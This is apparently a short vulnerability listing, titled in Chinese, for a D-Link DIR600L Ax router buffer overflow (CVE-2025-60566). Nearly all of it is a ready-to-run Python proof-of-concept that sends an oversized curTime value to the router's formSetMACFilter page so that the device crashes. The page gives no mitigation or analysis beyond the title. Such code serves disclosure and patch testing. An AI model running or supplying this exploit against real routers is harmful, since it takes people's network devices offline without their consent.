D-Link DIR600L Ax缓冲区溢出漏洞（CVE-2025-60566）

import requests # CVE-2025-60566 PoC - D-Link DIR600L Ax Buffer Overflow # Target: formSetMACFilter function with curTime parameter target_ip = "192.168.0.1" # Router default IP target_url = f"http://{target_ip}/formSetMACFilter" # Generate payload with excessive length to trigger buffer overflow # Typical buffer size in embedded devices is 256-1024 bytes payload = "A" * 2000 data = { "curTime": payload, "macFilterEnabled": "1" } try: print(f"[*] Sending exploit to {target_url}") print(f"[*] Payload length: {len(payload)}") response = requests.post(target_url, data=data, timeout=10) print(f"[+] Response status: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[!] Request failed: {e}") print("[+] If device becomes unresponsive, vulnerability is confirmed")